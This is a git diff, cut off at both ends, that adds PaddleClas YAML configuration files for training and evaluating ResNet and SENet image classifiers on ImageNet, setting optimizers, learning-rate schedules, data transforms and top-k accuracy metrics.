loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet18_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet18_vd.yaml new file mode 100644 index 0000000..e0ba71a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet18_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet18_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet200_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet200_vd.yaml new file mode 100644 index 0000000..98de87e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet200_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet200_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet34.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet34.yaml new file mode 100644 index 0000000..92f4569 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet34.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet34 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet34_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet34_vd.yaml new file mode 100644 index 0000000..9ff0717 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet34_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet34_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50.yaml new file mode 100644 index 0000000..b338b63 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_fp16.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_fp16.yaml new file mode 100644 index 0000000..e58539b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_fp16.yaml @@ -0,0 +1,147 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_channel: &image_channel 4 + image_shape: [*image_channel, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# mixed precision training +AMP: + scale_loss: 128.0 + use_dynamic_loss_scaling: True + use_pure_fp16: &use_pure_fp16 True + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + input_image_channel: *image_channel + data_format: "NHWC" + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + multi_precision: *use_pure_fp16 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + + sampler: + name: DistributedBatchSampler + batch_size: 32 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_fp16_dygraph.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_fp16_dygraph.yaml new file mode 100644 index 0000000..59d4bce --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_fp16_dygraph.yaml @@ -0,0 +1,148 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + image_channel: &image_channel 4 + # used for static mode and model export + image_shape: [*image_channel, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + use_dali: True + +# mixed precision training +AMP: + scale_loss: 128.0 + use_dynamic_loss_scaling: True + use_pure_fp16: &use_pure_fp16 False + +# model architecture +Arch: + name: ResNet50 + class_num: 1000 + input_image_channel: *image_channel + data_format: "NHWC" + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + output_fp16: *use_pure_fp16 + channel_num: *image_channel + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_vd.yaml new file mode 100644 index 0000000..ba38350 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNet/ResNet50_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SENet154_vd.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SENet154_vd.yaml new file mode 100644 index 0000000..f8255a9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SENet154_vd.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SENet154_vd + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt101_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt101_32x4d.yaml new file mode 100644 index 0000000..bf27461 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt101_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNeXt101_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt101_32x4d_fp16.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt101_32x4d_fp16.yaml new file mode 100644 index 0000000..5408586 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/SENet/SE_ResNeXt101_32x4d_fp16.yaml @@ -0,0 +1,140 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_channel: &image_channel 4 + image_shape: [*image_channel, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: SE_ResNeXt101_32x4d + class_num: 1000 + input_image_channel: *image_channel + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +# mixed precision training +AMP: + scale_loss: 128.0 + use_dynamic_loss_scaling: True + use_pure_fp16: 